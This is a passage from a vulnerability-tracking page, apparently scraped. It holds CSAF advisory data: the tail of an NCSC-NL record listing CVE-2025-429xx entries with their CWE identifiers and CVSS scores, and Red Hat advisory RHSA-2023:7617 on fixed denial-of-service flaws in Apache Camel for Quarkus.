],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42929 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42929.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2025-42929"
},
{
"cve": "CVE-2025-42930",
"cwe": {
"id": "CWE-606",
"name": "Unchecked Input for Loop Condition"
},
"notes": [
{
"category": "other",
"text": "Unchecked Input for Loop Condition",
"title": "CWE-606"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42930 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42930.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2025-42930"
},
{
"cve": "CVE-2025-42933",
"cwe": {
"id": "CWE-522",
"name": "Insufficiently Protected Credentials"
},
"notes": [
{
"category": "other",
"text": "Insufficiently Protected Credentials",
"title": "CWE-522"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42933 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42933.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2025-42933"
},
{
"cve": "CVE-2025-42938",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"title": "CWE-79"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42938 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42938.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2025-42938"
},
{
"cve": "CVE-2025-42941",
"cwe": {
"id": "CWE-1022",
"name": "Use of Web Link to Untrusted Target with window.opener Access"
},
"notes": [
{
"category": "other",
"text": "Use of Web Link to Untrusted Target with window.opener Access",
"title": "CWE-1022"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42941 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42941.json"
}
],
"title": "CVE-2025-42941"
},
{
"cve": "CVE-2025-42944",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"notes": [
{
"category": "other",
"text": "Deserialization of Untrusted Data",
"title": "CWE-502"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42944 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42944.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 10.0,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2025-42944"
},
{
"cve": "CVE-2025-42958",
"cwe": {
"id": "CWE-250",
"name": "Execution with Unnecessary Privileges"
},
"notes": [
{
"category": "other",
"text": "Execution with Unnecessary Privileges",
"title": "CWE-250"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42958 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42958.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2025-42958"
},
{
"cve": "CVE-2025-42961",
"cwe": {
"id": "CWE-862",
"name": "Missing Authorization"
},
"notes": [
{
"category": "other",
"text": "Missing Authorization",
"title": "CWE-862"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42961 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42961.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2025-42961"
}
]
}
RHSA-2023:7617
Vulnerability from csaf_redhat - Published: 2023-11-30 15:00 - Updated: 2026-04-30 13:13Summary
Red Hat Security Advisory: Red Hat Build of Apache Camel for Quarkus 3.2.0 release (RHBQ 3.2.9.Final)
Severity
Important
Notes
Topic: Red Hat Build of Apache Camel for Quarkus 3.2.0 is now available (updates to RHBQ 3.2.9.Final). The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products
Details: Red Hat Build of Apache Camel for Quarkus 3.2.0 is now available (updates to RHBQ 3.2.9.Final). The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products:
* CVE-2023-39410 avro: apache-avro: Apache Avro Java SDK: Memory when deserializing untrusted data in Avro Java SDK
* CVE-2023-5072 JSON-java: parser confusion leads to OOM
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A flaw was found in the org.json package. A bug in the parser exists, and an input string may lead to undefined usage of memory, leading to an out-of-memory error, causing a denial of service (DoS).
7.5 (High)
Affected products
Fixed
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat build of Apache Camel 4 for Quarkus 3
Red Hat / Red Hat Integration
|
cpe:/a:redhat:camel_quarkus:3.2.0
|
— |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
A flaw was found in apache-avro. When deserializing untrusted or corrupted data, it is possible for a reader to consume memory beyond the allowed constraints, leading to an out-of-memory error and a denial of service on the system.
7.5 (High)
Affected products
Fixed
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat build of Apache Camel 4 for Quarkus 3
Red Hat / Red Hat Integration
|
cpe:/a:redhat:camel_quarkus:3.2.0
|
— |
Vendor Fix
fix
|
Threats
Impact
Important
References
17 references
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat Build of Apache Camel for Quarkus 3.2.0 is now available (updates to RHBQ 3.2.9.Final). The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Build of Apache Camel for Quarkus 3.2.0 is now available (updates to RHBQ 3.2.9.Final). The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products:\n * CVE-2023-39410 avro: apache-avro: Apache Avro Java SDK: Memory when deserializing untrusted data in Avro Java SDK\n * CVE-2023-5072 JSON-java: parser confusion leads to OOM",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2023:7617",
"url": "https://access.redhat.com/errata/RHSA-2023:7617"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2023-39410",
"url": "https://access.redhat.com/security/cve/CVE-2023-39410"
},
{
"category": "external",
"summary": "2242521",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242521"
},
{
"category": "external",
"summary": "2246417",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2246417"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_7617.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Build of Apache Camel for Quarkus 3.2.0 release (RHBQ 3.2.9.Final)",
"tracking": {
"current_release_date": "2026-04-30T13:13:29+00:00",
"generator": {
"date": "2026-04-30T13:13:29+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.7"
}
},
"id": "RHSA-2023:7617",
"initial_release_date": "2023-11-30T15:00:38+00:00",
"revision_history": [
{
"date": "2023-11-30T15:00:38+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2023-11-30T15:00:38+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-30T13:13:29+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat build of Apache Camel 4 for Quarkus 3",
"product": {
"name": "Red Hat build of Apache Camel 4 for Quarkus 3",
"product_id": "Red Hat build of Apache Camel 4 for Quarkus 3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:camel_quarkus:3.2.0"
}
}
}
],
"category": "product_family",
"name": "Red Hat Integration"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-5072",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2023-10-25T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2246417"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the org.json package. A bug in the parser exists, and an input string may lead to undefined usage of memory, leading to an out-of-memory error, causing a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "JSON-java: parser confusion leads to OOM",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability may cause denial of service with a small string input, causing the server to be unresponsive easily, hence the Important impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat build of Apache Camel 4 for Quarkus 3"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-5072"
},
{
"category": "external",
"summary": "RHBZ#2246417",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2246417"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-5072",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5072"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-5072",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5072"
},
{
"category": "external",
"summary": "https://github.com/stleary/JSON-java/issues/758",
"url": "https://github.com/stleary/JSON-java/issues/758"
},
{
"category": "external",
"summary": "https://github.com/stleary/JSON-java/issues/771",
"url": "https://github.com/stleary/JSON-java/issues/771"
}
],
"release_date": "2023-10-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-11-30T15:00:38+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat build of Apache Camel 4 for Quarkus 3"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:7617"
},
{
"category": "workaround",
"details": "No current mitigation is available for this flaw.",
"product_ids": [
"Red Hat build of Apache Camel 4 for Quarkus 3"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat build of Apache Camel 4 for Quarkus 3"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "JSON-java: parser confusion leads to OOM"
},
{
"cve": "CVE-2023-39410",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2023-10-06T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2242521"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in apache-avro. When deserializing untrusted or corrupted data, it is possible for a reader to consume memory beyond the allowed constraints, leading to an out-of-memory error and a denial of service on the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "apache-avro: Apache Avro Java SDK: Memory when deserializing untrusted data in Avro Java SDK",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat build of Apache Camel 4 for Quarkus 3"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-39410"
},
{
"category": "external",
"summary": "RHBZ#2242521",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242521"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-39410",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39410"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-39410",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39410"
},
{
"category": "external",
"summary": "https://issues.apache.org/jira/browse/AVRO-3819",
"url": "https://issues.apache.org/jira/browse/AVRO-3819"
}
],
"release_date": "2023-09-29T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-11-30T15:00:38+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat build of Apache Camel 4 for Quarkus 3"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:7617"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat build of Apache Camel 4 for Quarkus 3"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "apache-avro: Apache Avro Java SDK: Memory when deserializing untrusted data in Avro Java SDK"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…